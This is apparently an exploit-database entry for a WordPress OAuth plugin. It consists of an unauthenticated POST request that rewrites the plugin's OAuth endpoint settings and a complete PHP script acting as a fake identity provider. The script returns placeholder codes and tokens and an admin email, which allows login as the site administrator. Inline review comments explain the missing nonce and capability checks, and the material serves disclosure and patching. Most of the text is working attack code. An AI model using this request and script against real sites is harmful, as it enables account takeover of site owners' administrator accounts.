## https://sploitus.com/exploit?id=WPEX-ID:55B83CEE-A8A5-4F9D-A976-A3EED9A558E5
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=oauthconfig&OAuthConfig_nonce=-&oauthservers=Custom_OAuth&client_id=-&client_secret=-&rquest_in_body=1&client_authorization=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fauth%3D1&client_token_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Ftoken%3D1&client_userinfo_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fresource%3D1
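With exploit.php (the script the three endpoint URLs in the request above point to, where it is named oauth-exploit.php) controlled by the attacker and containing the code below. The request carries only a placeholder nonce (`OAuthConfig_nonce=-`) and no session cookie, which suggests the plugin's settings handler accepts the change without a valid nonce or capability check; once the endpoints are re-pointed, the plugin has no independent way to tell a genuine identity provider from this script.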
/**
 * Authorization endpoint of the stand-in identity provider.
 *
 * Handles requests carrying `auth` and `response_type=code` in the query
 * string and answers with a redirect to the caller-supplied `redirect_uri`,
 * appending a fixed `code` parameter. No user is authenticated and no client
 * is identified here; the block only checks that the two parameters are present.
 *
 * NOTE(review): `redirect_uri` is copied into the Location header without
 * validation. A real provider would compare it against the registered value.
 */
if ( isset( $_GET['auth'], $_GET['response_type'] ) && 'code' == $_GET['response_type'] ) {
	// Placeholder authorization code; per the PoC author it only has to be non-empty.
	$query = http_build_query( array( 'code' => '-' ) );

	header( 'Location: ' . $_GET['redirect_uri'] . '/?' . $query );
	exit;
}
/**
 * Token endpoint of the stand-in identity provider.
 *
 * Any POST that carries a `grant_type` field (with `token` in the query
 * string) receives a JSON body holding a fixed `access_token`. The submitted
 * authorization code, client id and client secret are never read, so the
 * exchange succeeds whatever the relying party sends.
 */
if ( isset( $_GET['token'], $_POST['grant_type'] ) ) {
	// Placeholder token; per the PoC author it only has to be non-empty.
	$payload = array( 'access_token' => '-' );

	echo json_encode( $payload );
	exit;
}
/**
 * Resource (userinfo) endpoint of the stand-in identity provider.
 *
 * Returns a fixed JSON profile whenever `resource` is present in the query
 * string. No bearer token or Authorization header is inspected.
 *
 * NOTE(review): presumably the plugin maps the `email` claim onto a local
 * WordPress account, which would make this response the point where the
 * login is decided. Confirm against the plugin's login handler. If so, the
 * fix belongs in the settings handler (nonce plus administrator capability
 * check), because a relying party cannot validate claims from an endpoint
 * an unauthenticated request was allowed to choose.
 */
if ( isset( $_GET['resource'] ) ) {
	$profile = array(
		'email'      => 'admin@localhost',
		// Placeholder login name; per the PoC author it only has to be non-empty.
		'user_login' => '-',
	);

	echo json_encode( $profile );
	exit;
}